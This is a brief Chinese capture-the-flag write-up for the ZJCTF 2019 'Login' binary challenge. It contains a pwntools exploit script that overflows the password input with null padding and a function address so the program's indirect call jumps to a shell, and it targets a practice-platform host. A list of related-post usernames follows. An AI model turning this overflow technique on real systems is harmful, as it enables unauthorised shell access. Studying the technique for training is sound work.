[ZJCTF 2019]Login
Yyqingmofeige 2020-02-29
exp 脚本
??C++写的程序,逆向分析有点费劲。注意到 password_checker 有 call rax 指令,倒推 rax 的来源,在 main 函数中把 rax 的来源覆盖为漏洞函数的地址即可 get shell
from pwn import *
io = remote('node3.buuoj.cn',27283)
shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))
io.interactive()感谢 keer 师傅的指点!
相关推荐
tianhuak 0喜欢 / 0评论 2020-11-24
huha 0喜欢 / 0评论 2020-10-16
lianshaohua 0喜欢 / 0评论 2020-09-23
laisean 0喜欢 / 0评论 2020-11-11
zhangjie 0喜欢 / 0评论 2020-11-11
大牛牛 0喜欢 / 0评论 2020-10-30
firefaith 0喜欢 / 0评论 2020-10-30
liguojia 0喜欢 / 0评论 2020-10-20
wangzhaotongalex 0喜欢 / 0评论 2020-10-20
以梦为马不负韶华 0喜欢 / 0评论 2020-10-20
CARBON 0喜欢 / 0评论 2020-10-20
彼岸随笔 0喜欢 / 0评论 2020-10-20
lianshaohua 0喜欢 / 0评论 2020-10-20
yutou0 0喜欢 / 0评论 2020-10-17
JohnYork 0喜欢 / 0评论 2020-10-16
xiaonamylove 0喜欢 / 0评论 2020-10-16
Julyth 0喜欢 / 0评论 2020-10-16
applecarelte 0喜欢 / 0评论 2020-10-16
ourtimes 0喜欢 / 0评论 2020-10-16
thickbookszone 0喜欢 / 0评论 2020-10-16
laisean 0喜欢 / 0评论 2020-09-27
flycappuccino 0喜欢 / 0评论 2020-09-27
liguojia 0喜欢 / 0评论 2020-09-27
wangzhaotongalex 0喜欢 / 0评论 2020-09-22
rechanel 0喜欢 / 0评论 2020-11-16
jarrygao 0喜欢 / 0评论 2020-11-02
步知道 0喜欢 / 0评论 2020-10-27
流年浅滩 0喜欢 / 0评论 2020-10-23
liujianhua 0喜欢 / 0评论 2020-10-22
woaimeinuo 0喜欢 / 0评论 2020-10-21
fanjunjaden 0喜欢 / 0评论 2020-10-09
pimshell 0喜欢 / 0评论 2020-10-06
myccc 0喜欢 / 0评论 2020-09-24
shipinsky 0喜欢 / 0评论 2020-09-23
touchfuture 0喜欢 / 0评论 2020-09-16
hongsheyoumo 0喜欢 / 0评论 2020-09-04
tufeiax 0喜欢 / 0评论 2020-09-03
laisean 0喜欢 / 0评论 2020-09-01
vvu 0喜欢 / 0评论 2020-09-16
吴家应 0喜欢 / 0评论 2020-09-16
libao 0喜欢 / 0评论 2020-09-16
卖口粥湛蓝的天空 0喜欢 / 0评论 2020-09-15
tryfind 0喜欢 / 0评论 2020-09-14
85251846 0喜欢 / 0评论 2020-09-14
Yyqingmofeige 0喜欢 / 0评论 2020-08-18
luobotoutou 0喜欢 / 0评论 2020-08-17
zhushixia 0喜欢 / 0评论 2020-08-17
xiaoyuerp 0喜欢 / 0评论 2020-08-17
xiaonamylove 0喜欢 / 0评论 2020-08-16
以梦为马不负韶华 0喜欢 / 0评论 2020-08-16